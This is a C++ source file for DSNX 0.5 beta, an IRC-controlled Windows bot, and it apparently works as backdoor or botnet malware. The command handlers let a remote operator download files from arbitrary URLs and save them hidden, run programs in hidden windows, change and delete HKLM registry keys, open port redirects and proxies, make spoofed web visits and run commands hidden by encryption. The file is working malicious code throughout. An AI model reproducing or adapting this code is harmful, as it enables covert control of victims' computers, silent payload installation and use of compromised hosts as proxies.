 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	StaticCommands.cpp - Commands which are compiled into DSNX by default

	Last revised : 31st March 2002

  */



#include <windows.h>
#include <stdio.h>

#include "../include/shared.h"
#include "../include/dsnxsockets.h"
#include "../include/staticcommands.h"
#include "../include/commands.h"
#include "../include/Clinkedlists.h"
#include "../include/mainbot.h"
#include "../include/tcp.h"
#include "../include/httpdownload.h"
#include "../include/nickdb.h"
#include "../include/settingstorage.h"
#include "../include/tea.h"
#include "../include/pluginmanager.h"
#include "../include/portredirect.h"
#include "../include/server.h"

/*

  Some examples of what you get in args and argc

	args and 1 command id
	args[0] is allways the command id...

	args = "raw","privmsg","#dsnx",":hello, this is a test!"
	argc = 3

	args = "set","channel","#dsnx"
	argc = 2

	etc... you get the idea!

  */

bool Cmd_Quit DSNX_CMD_PARAMS {
/*
	Quit - Quits mainbots.. if the only mainbot running, or original mainbot
	also exits the application (possible restart time)

	<PREFIX>quit <restart_time>
			  1			2
*/
	if (argc > 0) {
		g_Restart = atoi(args[1]);
	} else
		g_Restart=0;

	if (bot) {

		//send_server_msg(c_QUITMSG,bot);
		bot->bStopUse = true;
			
		if (g_IOList->Count() < 3 || g_Restart != 0)
			g_Shutdown = true;
		
	}
	else
		g_Shutdown = true;

	*buffer =0;
	return true;
}

#include "../include/auth.h"

/*
	Logout - Logs out the user
	<prefix>logout
*/

bool Cmd_Logout DSNX_CMD_PARAMS
{
	/* this is only for ircbots */
	if (!bot)
		return false;

	if (IRCLogout(from,&bot->auth)) {

		sprintf(buffer,"Logged out");

	} else {

		*buffer = 0;
	}

	return true;

}



char *GetOSName() {

	char *OS,*b=(char*)malloc(3);
	OSVERSIONINFO osvi;
	osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
	GetVersionEx (&osvi);

	memset(b,0,3);

	if (osvi.dwPlatformId == VER_PLATFORM_WIN32_WINDOWS)
	{
		if (osvi.dwMajorVersion >= 5) OS = "me";
		else if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion >= 10) OS = "98";
		else if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion ==0 )	OS = "95";
	}
	else if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT)
	{
		if (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion >= 1)OS = "xp";
		else if (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0)OS = "2k";
		else if (osvi.dwMajorVersion == 4)OS = "n4";
		else if (osvi.dwMajorVersion == 3)OS = "n3";
	}
	strcpy(b,OS);
	return b;
}

/*
	Gets info such as uptime, os, listening and open sockets, version
	<prefix>info

  */

bool Cmd_Info DSNX_CMD_PARAMS
{
	DWORD iMin	= (GetTickCount() - l_UP)/60000,iHour = iMin / 60;
	char *os = GetOSName();

	iMin -= iHour * 60;

	sprintf(buffer,"(DSNX0.5b up %.3d:%.2d on win%s with %.2d threads)",
		iHour,
		iMin,
		os,
		g_IOList->Count());

	free (os);

	/*
		Yeah i know im optimistic about having three figure hour uptimes :D
		If you can see the info - with 2 threads - one is ident, the other a mainbot
		(0.5b up 000:00 on win2k with 02 threads)
	*/

	return true;
}

/*
	<prefix>raw <command>
			0		1
*/


bool Cmd_RawIRC DSNX_CMD_PARAMS
{
	USHORT count = 0,len=0;
	char *buf;
	/* this is only for ircbots */
	if (!bot || !argc)
		return false;

	while (count++ < argc) 
		len += strlen(args[count]);

	count = 0;	

	buf = (char*)malloc(len + argc * 2);

	if (!buf)
		return false;

	*buf =0;
	
	while (count++ < argc) {

		strcat(buf,args[count]);
		if (count <argc)
			strcat(buf," ");
	}

	send_server_msg(buf,bot->s);
	free(buf);
	*buffer =0;

	return true;

}
bool Cmd_NewIRCNick DSNX_CMD_PARAMS
{
	/* this is only for ircbots */
	if (!bot)
		return false;

	if(argc == 1) {

		iMaxNickLen = atoi(args[1]);

		if (iMaxNickLen< 5)
			iMaxNickLen =5;
		else
			if (iMaxNickLen > 25)
			iMaxNickLen =25;
	}

	bot->NewNick();
	*buffer = 0;
	return true;
}

/*
	<PREFIX>M #channel Irc_Server Port
			0		1		2		3
*/

bool Cmd_MainBot DSNX_CMD_PARAMS
{
	USHORT port=6667;
	char *chan,*server;

	if (argc < 2 && !bot)
		return false;

	if (argc < 1){
		chan = bot->cChannel;
	} else {
		chan = args[1];
	}

	if (argc < 2) {
		server = bot->cServer;
	} else {
		server = args[2];
	}

	if (argc < 3) {
		if (bot)
			port = bot->iPort;
	}
	else
		port = atoi(args[3]);

	if (!port || port < 1)
		port =6667;

	MainBot *mb = new MainBot(server,chan,port);
	mb->Insert(&g_IOList);
	sprintf(buffer ,"Created MB %s %s:%d",chan,server,port);
	return true;

}

/*
  New:
	<prefix>s new name servers....
			0	1	2	3
  Del:
	<prefix>s del name
			0	1	2
  Rename:
	<prefix>s ren name new_name
			0	1	2	3
*/

#include "../include/serverlist.h"
CLinkedList *g_ServerList = 0;

bool Cmd_ServerLists DSNX_CMD_PARAMS
{
	if (argc < 1)
		return false;

	if ( !stricmp(args[1],"new")) {

		if (argc < 4)
			return false;

		if (g_ServerList != 0) {
			if (g_ServerList->Get(args[2])) {

				strcpy(buffer,"Names must be unique");
				return false;
			}
		}

		ServerList *newlist = new ServerList(args[2],argc-2,&args[3]);
		newlist->Insert(&g_ServerList);
		sprintf(buffer,"%d servers added to list named '%s'",argc-2,args[2]);

		return true;

	} else if ( !stricmp(args[1],"del")) {

		if (argc < 2)
			return false;

		if (g_ServerList == 0) {
			strcpy(buffer,"No server lists");
			return false;
		}

		CLinkedList *list = g_ServerList->Get(args[2]);

		if (!list) {
			strcpy(buffer,"List not found");
			return false;
		}

		list->Remove(&g_ServerList);

		strcpy(buffer,"List removed");
		return true;
		
	} else if ( !stricmp(args[1],"ren")) {

		if (argc < 3)
			return false;

		if (g_ServerList == 0) {
			strcpy(buffer,"No server lists");
			return false;
		}

		CLinkedList *list = g_ServerList->Get(args[2]);

		if (!list) {
			strcpy(buffer,"List not found");
			return false;
		}

		if(list->Rename(args[3]) != true) {
			
			strcpy(buffer,"Cannot rename, a list by that name already exists");
			return false;

		} else {

			strcpy(buffer,"List renamed");
			return true;

		}

	} else if ( !stricmp(args[1],"list") ) {

		if (!g_ServerList) {
			strcpy(buffer,"No server lists");
			return true;
		}

		CLinkedList *list = g_ServerList;
		USHORT count = list->Count();

		sprintf(buffer,"%d list(s) are '",count);

		char buf[32];

		while (count-- > 0) {

			strcat(buffer,list->name);
			sprintf(buf,"'(%d) '",((ServerList*)list)->count);
			strcat(buffer,buf);
			
			list = list->Get(1);

		}

		buffer[strlen(buffer)-1] = 0;

		return true;

	}

	return false;
}

/*
	<PREFIX>w url execute
			0	1	2
*/

bool Cmd_HttpDownload DSNX_CMD_PARAMS
{
	char *saveTO;

	if (argc < 1)
		return false;

	if (argc < 2) {
		char *ext = strrchr(args[1],'.'),buf[256];

		if (!ext)
			return false;

		saveTO = RandomText(buf,Random(17,25));

		saveTO[Random(5,12)] = 0;
		strcat(saveTO,ext);
	}
		else
			saveTO = args[2];


	return HttpDownload(args[1],saveTO,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,from,where,bot,buffer);

}




bool Cmd_UpdateSettings DSNX_CMD_PARAMS
{
	if (argc < 1)
		return false;

	HKEY hRegKey;
	char *cSubKey=RegKey,*cValue;

	cValue = strrchr(cSubKey,'\\');

	if(!cValue)
		return false;

	*(cValue++) = 0;

	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,cSubKey,0,KEY_ALL_ACCESS,&hRegKey) != ERROR_SUCCESS)
		return false;

	int err;
	if ( (err=RegSetValueEx(hRegKey,cValue,0,REG_SZ,(const unsigned char*)args[1],strlen(args[1]) + 1)) != ERROR_SUCCESS)
	{
		FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,NULL,err,0,buffer,128,NULL);

		cValue--;
		*cValue = '\\';
		return false;
	}
	cValue--;
	*cValue = '\\';
	
	if ( (err=RegCloseKey(hRegKey)) != ERROR_SUCCESS) {
		FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,NULL,err,0,buffer,128,NULL);
		return false;
	}

	strcpy(buffer,"Settings updated. Restart for changes to take effect");

	return true;

}

bool bUninstall = false;

bool Cmd_RemoveFromReg	DSNX_CMD_PARAMS 
{

	if (bUninstall == false) {
		bUninstall = true;
		strcpy(buffer,"Again to confirm");
		return false;
	}
	
	HKEY hRegKey;
	char *cSubKey=InstalledIn,*cValue;

	if (InstalledIn == NULL) {
		return false;
	}

	cValue = strrchr(cSubKey,'\\');

	if(!cValue)
		return false;

	*(cValue++) = 0;

	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,cSubKey,0,KEY_ALL_ACCESS,&hRegKey) != ERROR_SUCCESS)
		return false;

	int err;
	if ( (err=RegDeleteKey(hRegKey,cValue)) != ERROR_SUCCESS)
	{
		FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,NULL,err,0,buffer,128,NULL);

		cValue--;
		*cValue = '\\';
		return false;
	}
	cValue--;
	*cValue = '\\';
	
	if ( (err=RegCloseKey(hRegKey)) != ERROR_SUCCESS) {
		FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,NULL,err,0,buffer,128,NULL);
		return false;
	}

	strcpy(buffer,"Uninstalled");
	return true;
}

bool Cmd_AddPlugins DSNX_CMD_PARAMS
{
	if (!argc)
		return false;

	if (!stricmp(args[1],"add")) {
		if (argc < 2)
			return false;

		sprintf(buffer,"%i plugins added",AddPlugins(args[2]));
		return true;

	} else if (!stricmp(args[1],"list")) {

			CLinkedList *plugin_ll ;
			USHORT count1=0,count2=0;

			if (!g_Plugins) {
				strcpy(buffer,"No plugins loaded");
				return true;
			}

			plugin_ll = g_Plugins;

			strcpy(buffer, "Loaded Plugins: \'" );

			do {

				CLinkedList *command_ll = ((DSNXPlugin*)(plugin_ll))->InstalledCommands;

				strcat(buffer,plugin_ll->name);
				strcat(buffer,"\'=(");

				if (!command_ll) {
					strcat(buffer,") \'");
					continue;
				}

				do { 
					strcat(buffer,((PluginTracker*)(command_ll))->cmd->name);
					strcat(buffer,",");

					command_ll = command_ll ->Get(1);

				} while ( command_ll != ((DSNXPlugin*)(plugin_ll))->InstalledCommands);

				buffer[strlen(buffer)-1] =0;

				strcat(buffer,") \'");

				plugin_ll = plugin_ll->Get(1);

			}while ( plugin_ll != g_Plugins );

			buffer[strlen(buffer)-1] = 0;

			return true;

	} else if (!stricmp(args[1],"unload")) {

		if (UnloadPlugin(args[2])) {

			strcpy(buffer,"Plugin unloaded");
			return true;

		}

		return false;
			



	}

	return false;
}

#include "../include/hextotext.h"
#include "../include/md5.h"

/*

  Having a static key is approx the same security as
  having a key transmitted with the encrypted message...

  A static key however shaves 24 chars off the length :D

  */

#define STATIC_KEY

#ifndef STATIC_KEY

void NewKey(pENCRYPTION_KEY k) {

	short i=4;

	memset(k,0,KEY_SIZE);

	while (i-- > 0) {
		unsigned short d = rand() * rand()/ rand() + rand() - rand();
		unsigned long a=d;

		while (d-- > 0) {

			a = a - (a * rand())/((a /(rand()+1))+1);
			a = a + (a / (rand()+1))*(a *rand());

		}

		k[i] = a;
	}

	return;
}

bool Cmd_EncryptCmd DSNX_CMD_PARAMS
{
	char *pBuffer, *pOutput;
	unsigned short Enc_Len;
	WORD crc=0;
	pENCRYPTION_KEY key;

	if (!argc )
		return false;

	key = (pENCRYPTION_KEY)malloc( KEY_SIZE );

	if (!key)
		return false;

	Enc_Len = ENC_ROUND_UP( strlen( args[1] ) );

	pBuffer = (char*) malloc( Enc_Len  + KEY_SIZE + 1);

	if (!pBuffer) {
		free(key);
		return false;
	}

	NewKey(key);

	memset( pBuffer + KEY_SIZE , 0 , Enc_Len );
	memcpy( pBuffer + KEY_SIZE , args[1] , strlen(args[1]) );

	crc = crc_calc( CRC16_START , pBuffer + KEY_SIZE , Enc_Len );

	memcpy(key,&crc,sizeof(crc));
	memcpy(pBuffer,key,KEY_SIZE);

	if (bot)
	if (BOT_UNIQUE(bot)) {
		key[0] += BOT_UNIQUE(bot);
		key[1] *= BOT_UNIQUE(bot);
		key[2] -= BOT_UNIQUE(bot);
		key[3] /= BOT_UNIQUE(bot);
	}

	Encrypt( pBuffer + KEY_SIZE , key , Enc_Len );
	Enc_Len += KEY_SIZE;

	if (HexToText( pBuffer , &Enc_Len , &pOutput )) {

		strcpy(buffer,pOutput);
		free(pOutput);

	} else {

		*buffer = 0;
	}

	free(key);
	free(pBuffer);
	return true;
}

bool Cmd_DecryptCmd DSNX_CMD_PARAMS
{
	char *pOutput;
	unsigned short Dec_Len;
	WORD crc=0;
	pENCRYPTION_KEY key;

	if (!argc)
		return false;

	Dec_Len = strlen(args[1]);

	if (Dec_Len % 3)
		return false;

	TextToHex(args[1],&pOutput,&Dec_Len);
	key = malloc(KEY_SIZE);

	if (Dec_Len < KEY_SIZE + 8 || !key) {
		free(pOutput);
		if (key)
			free(key);
		return false;
	}

	memcpy(key,pOutput,KEY_SIZE);
	memcpy(&crc,key,sizeof(crc));

	if (bot)
	if (BOT_UNIQUE(bot)) {
		key[0] += BOT_UNIQUE(bot);
		key[1] *= BOT_UNIQUE(bot);
		key[2] -= BOT_UNIQUE(bot);
		key[3] /= BOT_UNIQUE(bot);
	}

	Decrypt( pOutput + KEY_SIZE , key , Dec_Len - KEY_SIZE );

 	if ( crc == crc_calc( CRC16_START , pOutput + KEY_SIZE, Dec_Len - KEY_SIZE )) {

		strcpy(buffer,pOutput+KEY_SIZE);
		CleanAndRun(buffer,from,mask,where,bot,auth_lvl);
		*buffer = 0;
	} else if (auth_lvl > NO_AUTH) {

		strcpy(buffer,"Bad CRC");
	}

	free (key);
	free (pOutput);
	if (*buffer)
		return false;
	else
		return true;
}

#else

unsigned char cStaticKey[16] =	{	0x00};

bool Cmd_EncryptCmd DSNX_CMD_PARAMS
{
	char *pBuffer, *pOutput;
	unsigned short Enc_Len;
	WORD crc=0;
	pENCRYPTION_KEY key;

	if (!argc)
		return false;

	key = (pENCRYPTION_KEY)malloc( KEY_SIZE );

	if (!key)
		return false;

	Enc_Len = ENC_ROUND_UP( strlen( args[1] ) );
	memcpy(key,cStaticKey,KEY_SIZE);
	pBuffer = (char*) malloc( Enc_Len  + 3);

	if (!pBuffer) {
		free(key);
		return false;
	}

	memset( pBuffer +2, 0 , Enc_Len );
	memcpy( pBuffer +2, args[1] , strlen(args[1]) );

	crc = crc_calc( CRC16_START , pBuffer+2, Enc_Len );

	memcpy(pBuffer,&crc,sizeof(crc));

	if (bot)
	if (bot->unique) {
		key[0] += bot->unique;
		key[1] *= bot->unique;
		key[2] -= bot->unique;
		key[3] /= bot->unique;
	}

	Encrypt( pBuffer+2, key , Enc_Len);

	Enc_Len += 2;

	if (HexToText( pBuffer , &Enc_Len , &pOutput )) {

		strcpy(buffer,pOutput);
		free(pOutput);

	} else {

		*buffer = 0;
	}

	free(key);
	free(pBuffer);
	return true;
}

bool Cmd_DecryptCmd DSNX_CMD_PARAMS
{
	char *pOutput;
	unsigned short Dec_Len;
	WORD crc=0;
	pENCRYPTION_KEY key;

	if (argc < 1)
		return false;

	Dec_Len = strlen(args[1]);

	if (Dec_Len % 3)
		return false;

	TextToHex(args[1],&pOutput,&Dec_Len);
	key =(unsigned long*) malloc(KEY_SIZE);

	if (Dec_Len < 8 || !key) {
		free(pOutput);
		if (key)
			free(key);
		return false;
	}

	memcpy(key,cStaticKey,KEY_SIZE);
	memcpy(&crc,pOutput,sizeof(crc));

	if (bot)
	if (bot->unique) {
		key[0] += bot->unique;
		key[1] *= bot->unique;
		key[2] -= bot->unique;
		key[3] /= bot->unique;
	}

	Decrypt( pOutput + 2, key , Dec_Len - 2 );

 	if ( crc == crc_calc( CRC16_START , pOutput + 2, Dec_Len - 2 )) {

		strcpy(buffer,pOutput+2);
		CleanAndRun(buffer,from,mask,where,bot,auth_lvl);
		*buffer =0;

	} else if (auth_lvl > NO_AUTH) {

		strcpy(buffer,"Bad CRC");
	}

	free (key);
	free (pOutput);
	if (*buffer)
		return false;
	else
		return true;
}

#endif

/*

  Command only availble to the startup function!

  Calls CleanAndRun for each command located in the first parc[] split with \n


  multi "set PASS_1 5f4dcc3b5aa765d61d8327deb882cf99\nset HSTS *\nset PRFX !\nset RPTC c\nset STUP m #dsnx localhost\\np *.dll\\nm #other h0h0"


  */

bool Cmd_MultiCmd DSNX_CMD_PARAMS
{
	USHORT count =0;
	if (!argc)
		return false;

	while (count ++ < argc) {

		CleanAndRun(args[count],from,mask,where,bot,auth_lvl);

	}

	*buffer = 0;
	return true;
}

#include "../include/settingstorage.h"

CLinkedList *g_SettingList = 0;

bool Cmd_SetSetting DSNX_CMD_PARAMS
{
	if (argc < 1)
		return false;

	sprintf(buffer,"'%s' ",args[1]);

	if (GetSetting(args[1])) {

		CLinkedList *list = g_SettingList->Get(args[1]);

		if (list) {
			list->Remove(&g_SettingList);
			delete list;
		}

		if (argc > 1) {

			strcat(buffer,"updated");
		} else {

			strcat(buffer,"deleted");
			return true;

		}
	}
	else {
		if (argc>1) {

			strcat(buffer,"created");

		} else {

			strcat(buffer,"not found");
			return false;

		}
	}

	char *setting = new char[strlen(args[2]) + 1];
	strcpy(setting,args[2]);
	
	CLinkedList *ss = new CLinkedList(args[1],setting);

	ss->Insert(&g_SettingList);

	
	return false;
}

#include "../include/md5.h"

bool Cmd_PrintMD5 DSNX_CMD_PARAMS
{
	MD5_CTX context;
	unsigned char digest[16];
	unsigned char mdigest[25];

	if (!argc)
		return false;

	MD5Init (&context);
	MD5Update (&context,(unsigned char*) args[1], strlen(args[1]));
	MD5Final (digest, &context);

	MDPrint(digest,mdigest);

	sprintf(buffer,"%s == MD5(\"%s\")",mdigest,args[1]);
	return true;
}

bool Cmd_Login DSNX_CMD_PARAMS
{
	*buffer = 0;
	if (auth_lvl != 0 || !argc){
		return false;
	}


	if (IRCLogin(args[1],from,mask,&bot->auth)) {

		char cInfo[256];

		Cmd_Info(cInfo,NULL,NULL,NULL,NULL,0,NULL,0);
		sprintf(buffer,"Logged in %s",cInfo);
		bot->SendIRCMessage(buffer,from,where,false);
	}

	return true;
}

/*

  Aliases:

  Valid variables are:
	%chan = channel its from
	%user = user its from
	%1-9  = args[1] - args[9]

*/

#include "../include/Aliases.h"

CLinkedList *g_AliasList = 0;

bool Cmd_Alias DSNX_CMD_PARAMS
{
	if (!stricmp(args[0],"alias")) {

		if (!stricmp(args[1],"new")) {

			if (argc < 3)
				return false;

			if (strchr(args[2],' ')) {
				strcpy(buffer,"Alii names must not containt spaces");
				return false;
			}

			if (g_CommandList != 0) {
				if (  g_CommandList->Get(args[2]) != 0   ){
					strcpy (buffer,"Alii must be unique & cannot be the same as any other command");
					return false;
				}
			}
			char *p = new char[strlen(args[3]) + 1];
			strcpy(p,args[3]);
			CLinkedList *alias = new CLinkedList(args[2],p);
			alias->Insert(&g_AliasList);

			AddCommandToList(args[2],Cmd_Alias,NO_AUTH);
			
			sprintf(buffer,"Added alias named '%s'",args[2]);
			return true;


		} else if (!stricmp(args[1],"del")) {

			if (argc < 2)
				return false;

			if (g_AliasList == 0) {
				strcpy(buffer,"No aliases defined");
				return false;
			}

			CLinkedList *list = g_AliasList->Get(args[2]),
				*clist = g_CommandList->Get(args[2]);


			if (list == 0 || clist == 0) {
				strcpy(buffer,"Alias not found");
				return false;
			}

			list->Remove(&g_AliasList);
			clist->Remove(&g_CommandList);

			strcpy(buffer,"Alias removed");
			
			return true;
		}

	} else {

		if ( g_AliasList == 0)
			return false;

		CLinkedList *l = g_AliasList->Get(args[0]);

		if (l) {

			char *alias = (char*)l->pointer,*buf,*p;
			USHORT count = argc,len=0;

			while (count > 0) {

				len+= strlen(args[count--]);

			}

			buf = (char*)malloc(len + strlen(alias) + 4);

			*buf =0;

			p = alias;

			while (*p) {

					if (*p++ == '$') {

						if (!strnicmp(p,"user",4)) {
							strcat(buf,from);
							p+=4;
						}
						else if (!strnicmp(p,"chan",4)) {
							strcat (buf,where);
							p+=4;
						}
						else if (!strnicmp(p,"me",2)) {
							strcat (buf,bot->my_nick);
							p+=2;
						}else if (*p == '+') {

							/* remove spaces */

							char *pointer = buf + strlen(buf) - 1;

							while (*pointer == ' ')
								*pointer-- = 0;

							p++;

							while (*p == ' ')
								p++;							
							
							
						} else if (isdigit(*p)) {
							if (*p - '0' <= argc)
								strcat(buf,args[*p -'0']);
							p++;
						}else if (g_SettingList != 0) {

							char *space = strchr(p,' ');

							if (space)
								*space = 0;

							char *setting = GetSetting(p);

							if (setting != 0) {
								strcat(buf,setting);
							}

							if (space) {
								*space = ' ';
								p = space;
							} else
								p+= strlen(p);

							
						}else
						strncat(buf,p-1,1);


					} else
						strncat(buf,p-1,1);
			}

			CleanAndRun(buf,from,mask,where,bot,auth_lvl);

			*buffer =0;
			return true;
		}





	}
	return false;
}


/*
	Portredirect - can act either as a static redirect, or as
					a http CONNECT etc.. type redirect, as used in MIRC

	<PREFIX>portr ListenPort <OUT_ADDRESS> <OUT_PORT>


 */

#include "../include/portredirect.h"
#include "../include/shared.h"
#include "../include/Clinkedlists.h"

bool Cmd_PortRedirect DSNX_CMD_PARAMS
{

	if (argc < 1)
		return false;

	if (!stricmp(args[1],"new")) {
		SOCKADDR_IN SA;
		int lSA = sizeof(SA);
		USHORT iPort,oPort;
		SOCKET s;
		char *lIp;

		if (argc < 2)
			return false;

		getsockname(bot->s,(struct sockaddr*)&SA,&lSA);
		lIp = inet_ntoa(SA.sin_addr);
		iPort = atoi(args[2]);

		if ( (s=TCPListen(atoi(args[2]))) == INVALID_SOCKET ) {
			strcpy(buffer,"Error something already listening on that port");
			return false;
		}else{
			HardClose(s);
		}

		if (argc < 3) {

			PortRedirect *proxy = new PortRedirect(0,0,iPort,true);

			proxy->Insert(&g_IOList);

			sprintf(buffer,"New PROXY created %s:%d",lIp,iPort);

			return true;
		}

		if (argc == 4)
			oPort = atoi(args[4]);
		else
			oPort = iPort;

		sprintf(buffer,"New port redirect created %s:%d -> %s:%d",lIp,iPort,args[3],oPort);

		PortRedirect * proxy  = new PortRedirect(args[3],oPort,iPort,false);
		proxy->Insert(&g_IOList);

		return true;

	} else if (!stricmp(args[1],"del")) {

		if (argc < 2)
			return false;

		USHORT count = g_IOList->Count(),c=0;
		CLinkedList *list;

		while (c  < count) {

			list = SearchFor(c++,PortRedirect_ID,0,(DSNXSocket*)g_IOList);

			if (list == 0)
				break;

			if (((PortRedirect*)list)->iPort == atoi(args[2])) {

				((PortRedirect*)list)->bStopUse = true;

				strcpy(buffer,"Deleted");
				return true;
			}
			
		}

		strcpy(buffer,"Error port redirect not found");
		return false;

	}

	return false;
}

/*
visit <URL> <REFERER> <HOST>
  */

char httpREQUEST[] = "\
GET %s HTTP/1.1\r\n\
Accept: */*\r\n\
Referer: %s\r\n\
Accept-Language: en-us\r\n\
Accept-Encoding: gzip, deflate\r\n\
User-Agent: Mozilla/4.0 (compatible; MSIE %d.%d; Windows %s)\r\n\
Host: %s\r\n\
Connection: Keep-Alive\r\n\r\n";

char *httpWINVERS[] = {"NT 5.1","2000","98; Win 9x 4.90","98","NT 5.0"};


bool Cmd_Visit DSNX_CMD_PARAMS
{
	char *buf;
	SOCKET s;
	long recvd;
	short timeout = 5500;

	if (argc < 3)
		return false;

	buf = (char*)malloc(strlen(httpREQUEST) + strlen(args[1]) + strlen(args[2]) + strlen(args[3]) + 256);

	if (!buf)
		return false;

	sprintf(buf,httpREQUEST,args[1],args[2],GetTickCount() %3 ? 6:5,GetTickCount() %3 ? 0:5,httpWINVERS[GetTickCount() %5],args[3]);

	s = SmartConnect(args[3],argc > 3 ? atoi(args[4]) : 80,DEFAULT_CONNECT_TIME);

	if (s==INVALID_SOCKET) {

		strcpy(buffer,"Error connecting to server");
		free(buf);
		return false;
	}

	TCPSend(s,buf,strlen(buf));

	free(buf);
	while ( (recvd = TCPRecv(s,&buf)) != -1 && timeout > 0) {
		if (recvd > 0)
			free(buf);
		else
			timeout-=150;

		Sleep(150);
	}

	strcpy(buffer,"URL Visited");
	return true;


}

bool Cmd_Run DSNX_CMD_PARAMS 
{

	if (argc < 1)
		return false;

	if(WinExec(args[1],argc > 1 ? SW_SHOW : SW_HIDE) > 31) {
		strcpy(buffer,"Run");
		return true;
	}

	return false;
}